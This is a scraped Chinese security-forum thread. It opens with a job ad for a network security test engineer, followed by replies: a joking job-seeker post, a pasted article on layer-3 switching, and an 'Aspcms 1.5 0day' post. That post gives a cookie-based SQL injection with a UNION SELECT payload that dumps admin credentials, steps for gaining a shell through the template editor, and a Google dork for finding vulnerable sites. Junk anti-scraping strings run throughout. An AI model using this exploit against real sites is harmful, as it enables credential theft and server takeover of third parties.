返回列表 发帖

[人才招聘] [招聘] [HR]上海四域 信息安全工程师

  • 招聘职位: 网络安全测试工程师
  • 公司名称: 上海四域信息技术有限公司
  • 工作地点: 上海
  • 专业要求: 计算机专业 
  • 学历要求: 大专
  • 工作经验: 应届
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.4world.cn/
  • 简历邮箱: hr@4world.cn
  • 联系电话: 021-61992641 找人力资源部HR
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++上海四域信息技术有限公司相关说明++++++++++

    岗位描述:7 P! `  b6 e0 L0 F6 D1 B5 s: s, `1 S* X
    1、负责入侵检测、漏洞扫描、防病毒系统及补丁管理系统的建设和运维;
    5 ]9 ?/ E/ {) m: E8 O2、定期对系统进行安全扫描评估等;
      @* A/ h) `2 S: n9 X* A. U3、对已有的安全设备的日常维护;
    % e' q: C. o3 W/ A) ^; u: R4、跟踪最新漏洞信息,定期编写安全事件分析报告;
    & y' d4 D. Y7 ]. d& I1 s% O4 Z5、完善安全培训体系,对内部员工进行安全培训; 9 b/ _! E  _# o: _
    6、处理日常安全事件,在出现网络攻击或安全事件时,24小时紧急响应服务,帮助系统工程师恢复系统,并调查取证,建立完善的安全防范及灾难补救机制;
    ; ]1 h2 K$ J5 `- \3 i5 J! k7、及时跟进最新安全动向,负责信息安全领域的技术研究,制定和维护相关技术规范、标准; : E! u: U3 e: E/ n; F
    8、根据安全现状制定、实施相关安全策略,建议合理的网络安全解决方案,完善相关文档和流程,定期审计实施效果;
    4 c. k; }6 Z* U8 e8 Y9、对内部系统进行安全评估,安全加固,安全审计等。/ @! n0 p, Q$ Z( e
    任职要求:
    2 N1 N8 i# ]  v- y( f  T1、大专及以上学历,理工科相关专业毕业,同时欢迎学习成绩优秀、学习能力强的本科应届毕业生;
    1 E; K; o3 i8 S( B2、逻辑思维敏捷,思路清晰,善于分析问题、解决问题,学习能力强;
    8 O! z+ c1 O$ h( ~7 r
    3、热爱研发工作,工作认真负责;7 V  p% y. K3 e. d$ P2 ~( h
    4、良好的沟通协调能力,并能够承受一定的工作压力;
    + [0 ]% r/ w+ h9 z9 {- O7 n6 Q) U7 y  W& @5 N8 P& F. Q, }" _
    福利待遇:
    + O  I* m# W  c& N$ k1、基本工资 + 加班、工作餐、住房、交通补助 + 年终奖金 + 年底双薪;
    6 F+ `; G" {$ T+ G6 L* b2、可根据新员工实际情况报销求职面试的差旅费,并可申请入职搬家损失补偿费;
    9 c# K6 T, g2 X) ?9 V  c3、缴纳养老保险、失业保险、医疗保险和住房公积金;# O0 R3 d$ {2 w9 U1 M
    4、可选择公司免费提供的四人间公寓;. i* Q, c$ o* ]8 A4 m! s
    5、一经录用公司将提供为期一个月的岗前培训,并由人力资源部为每位新员工制定职业发展规划;0 ^; J% c# Z1 M! f
    6、可参加公司内部的培训课程,培训合格可申请内部调岗;

     

    您可能还想看的主题:

    [HR]北京安码科技 信息安全工程师

    浙江政安信息安全研究中心招贤纳士啦!

    安全宝招聘安全服务工程师

    关于信息安全等级保护

    600万用户遭泄密案告破 CSDN首吃信息安全罚单

    SpyEye 1.3.45 Loader源代码下载

    知道创宇长期招聘Web安全研究员/Python Web研发工程师

    北京某安全公司招聘WEB安全工程师

    新浪招聘安全工程师、安全开发工程师

    谷歌雅虎等宣布6月24日为全球IPv6测试日

    1

    评分人数

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:jeffzua发表,本帖发表者jeffzua符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者jeffzua和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    mark。。。。

    TOP

    我想去,要不要我呀?

    TOP

    求职:9 F: [4 {) L  T3 J
    + E3 {/ z/ c0 Q& u
    招聘职位: 有待商议
    4 G; R) q/ y/ K' @公司名称:寻求中 ! U* }0 o7 m4 }" g# t5 p9 k/ O
    工作地点: 未知
    ( w, [/ p/ P5 Z* `/ f: d  `, l专业要求: 计算机专业 (要我会的)% e, Z) v+ n' o+ o4 S
    学历要求: 大专
    % O7 U0 H" r8 n2 h工作经验: 应届 " |0 B# Q- b6 Z( }$ x
    职位薪金: 面议(吃住等外,得要有钱用) # a- T/ u5 W4 c" n/ y) {9 _) I8 L/ J
    年龄要求: 20-25- U4 n8 \; u* d& @; C$ u" r
    性别要求: 男  
    2 s! D3 ~0 V" t1 G" m4 K& h. X个人中心: http://hi.baidu.com/無情M3 A- A8 V) g  O4 T0 ~' a8 E
    简历:自己来了解 4 z0 y. E9 v( P
    联系电话:136599959**: M# F2 p  {. ?5 }
    在线QQ: 402893*

    TOP

    交换技术知识 第三层交换技术基本特征
      
      A+ L* Q- z1 U<P style="TEXT-INDENT: 2em">第三层交换技术也称为IP交换技术。它将第二层交换机和第三层路由器两者的优势结合成为一个有机的整体,是一种利用第三层协议中的信息来加强第二层交换功能的机制,是新一代局域网路由和交换技术。第三层交换技术具有以当前系统1/10的代价获得传输性能于过去10倍的能力。既然第三层交换机能够代替路由器执行传统路由器的大多数功能,它应该具有路由的基本特征。我们知道,路由的核心功能主要包括数据报文转发和路由处理两方面。数据报文转发是路由器和第三层交换机最基本的功能,用来在子网间传送数据报文;路由处理子功能包括创建和维护路由表,完成这一功能需要启用路由协议如RIP或OSPF来发现和建立网络拓扑结构视图,形成路由表。路由处理一旦完成,将数据报文发送至目的地就是报文转发子功能的任务了。报文转发子功能的工作包括检查IP报文头、IP数据包的分片和重组、修改存活时间(TTL)参数、重新计算IP头校验和、MAC地址解析、IP包的数据链路封装以及IP包的差错与控制处理(ICMP)等等。第三层交换也包括一系列特别服务功能,如数据包的格式转换,信息流优先级别划分,用户身份验证及报文过滤等安全服务,IP地址管理,局域网协议和广域网协议之间的转换。当第三层交换机仅用于局域网中子网间或VLAN间转发业务流时可以不执行路由处理,只作第三层业务流转发,这种情况下设备可以不需要路由功能。 ' P( v: X# r5 Z& Q
    <P style="TEXT-INDENT: 2em">& D0 t# J  s  `' P! j4 _4 ^
    <P style="TEXT-INDENT: 2em">由于传统路由器是一种软件驱动型设备,所有的数据包交换、路由和特殊服务功能,包括处理多种底层技术和多种第三层协议几乎都由软件来实现,并可通过软件升级增强设备功能,因而具有良好的扩展性和灵活性。但它也具有配置复杂、价格高、相对较低的吞吐量和相对较高的吞吐量变化等缺点。第三层交换技术在很大程度上弥补了传统路由器这些缺点。在设计第三层交换产品时通常使用下面一些方法:
    + ~: ~' F# ?) Z& u4 g# U<P style="TEXT-INDENT: 2em">( X: e: s2 A* t% _5 G; l1 ]
    <P style="TEXT-INDENT: 2em">·削减处理的协议数,常常只对IP; * Z2 u& u6 T1 ?: R4 P
    <P style="TEXT-INDENT: 2em">
    " L2 @* y! c# o2 @2 T<P style="TEXT-INDENT: 2em">·只完成交换和路由功能,限制特殊服务; 2 B: M# B4 \, Y" B  ]1 V5 z
    <P style="TEXT-INDENT: 2em">5 j1 `; M. L0 G
    <P style="TEXT-INDENT: 2em">·使用专用集成电路(ASIC)构造更多功能,而不是采用RSIC处理器之上的软件运行这些功能。 : z  b! p2 B- O8 U( l
    <P style="TEXT-INDENT: 2em">* b- N8 L: K8 t( F0 i2 Y
    <P style="TEXT-INDENT: 2em">第三层交换产品采用结构化、模块化的设计方法,体系结构具有很好的层次感。软件模块和硬件模块分工明确、配合协调,信息可为整个设备集中保存、完全分布或高速缓存。例如,IP报文的第三层目的地址在帧中的位置是确定的,地址位就可被硬件提取,并由硬件完成路由计算或地址查找;另一方面,路由表构造和维护则可继续由RSIC芯片中的软件完成。总之,第三层交换技术及产品的实现归功于现代芯片技术特别是ASIC技术的迅速发展[/quote]" ]9 w8 @2 u2 S# \
    # o1 ~  s2 R4 a7 z7 d8 I( o0 l

    7 e' r1 C( z! U! m% W' y; c) h) z7 C8 e
    & W& }! e/ `+ s& f8 H( G7 d) g! o
    0 L6 P# \5 a; R' {8 S- ?

    / K: R. m: N) w% v) i; d# l% o; @5 o/ b8 u' ~2 v& Y$ e- c9 o5 G& q2 W

    " o2 @3 N. [& w* W0 S; v' Y$ v7 |/ f6 o

    # i: D$ h( P" |/ @4 r- n6 t
    : |3 r5 L& h- G  \% U' c
    / V" A/ x; e! W( ^1 @* d! d5 ^: A1 R. r  ^% O8 E# w  _

    ! [# c7 h- E& h4 O1 w$ x2 c) X9 V6 L9 E5 f5 z6 h
    0 Z) T( i1 j6 \! z$ `$ w% v/ y

    $ s) F9 {' \1 a" h) `3 P$ `. z, L' c% n  _9 \( B
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Aspcms 稳定版1.5 0day
    Author: Virushack
    4 m" s3 s0 I9 p0 z* }7 I
    Blog: http://virushack.org

    6 w6 p, f  l+ W4 L
    From:www.v5script.org
    ; Q  O' h6 ~; f7 M' B* I5 g& j
    漏洞文件:editpass.asp

    1 d& M- L9 Y9 {$ ^6 P4 t
    漏洞代码:
    8 C7 _: ~* W2 y. W9 W" o
    Dim   linkman  ,  gender  ,  phone  ,  mobile  ,  email  ,  qq  ,  address  , postcode
    . e" t' h( t( K8 X( @) i$ zif   isnul  (  rCookie  (  "loginstatus"   ))   then   wCookie  "loginstatus"   ,  0
    & R2 y# C# T) d; x6 D, P& }if   rCookie  (  "loginstatus"   )=  1     then  4 S; K# m, n) I" f) D
    set   rsObj  =  conn  .  Exec   (  "select * from aspcms_Users where UserID=" &amp; trim  (  rCookie  (  "userID"  )),  "r1" )  . X' S# Z. I$ ?, R
    直接通过rCookie 取得userid带入查询.
    + j9 s$ B( i! o* r$ v0 S1 i再看看 rcookie函数的处理
    $ w  U/ x$ X6 M3 m0 z5 w( ?1 {
    '读cookies , p. L# w6 [! }3 I
    Function rCookie(cookieName) . {/ ?" c8 o% w- v1 C
    rCookie=request.cookies(cookieName) ( t6 c( G, P' \: K# z7 g, e
    End Function
    ; N: H3 N$ J& a直接通过cookies取得

    ( i( z1 d* J+ M$ D0 x$ W  o0 p
    利用:
    7 r% ~" J) Q! T4 v  Z7 p* J1.注册个帐号让 loginstatus不为空 + ?; |/ L: U' u; y3 T1 y; L& m1 l
    2.cookies注入 userID(不管你手注还是工具都行 推荐用火狐的cookies插件)

    6 c* `& f5 H9 _( ^4 e1 [
    Exploit:UNION SELECT 1,2,3,4,5,6,username,adminpassword,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Aspcms_admins

    + a- D4 F3 ]% Q4 M4 \
    后台拿shell 就更简单了  插一句话什么都行  我这就用最稳当的方法

    # r, E, d) W) t2 s: |
    http://127.0.0.1/admin/_Style/AspCms_TemplateEdit.asp?filename=a.asp

    - _2 T& Y" H; l: [
    http://127.0.0.1/Templates/default/html/a.asp

    / [, s5 H1 s; [+ o( r' e) w; z
    Google Dork: Powered by AspCms v1.5

    & x/ j  K8 E- o1 J5 p$ v, T. D( W6 H+ `: O4 f) `
    , Q" [; s1 f1 n3 y. p
    - \2 q5 Y0 X! I* M/ J
    : Y- M$ l  _2 O( {0 Z! ~, S

    4 D8 X, h$ C0 X+ n) u' G
    ) A. \7 k: h1 b( F' P* L
    ( u! }2 F* P/ L" H- r0 G/ X4 b6 R, W& P9 z, {% ]& N  ^3 Y4 h
    6 b" I$ X& s5 Y2 C4 X

    % ^% [4 u  M3 h" \/ k" h: f" J/ Y- u2 l( Y) M: U5 {
    3 k8 r0 F! \/ e( g- Q+ O

    . g$ Z  m5 b* @
    , M, O- S, E( l; P3 ?; _: c4 d! I: s! p; i# f% X

    ; n1 D6 z6 t: q2 V  r7 p
    & t; {2 o2 o6 E2 n) U/ @0 Y, w
    . Q( c" d1 S6 \6 C" ^公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表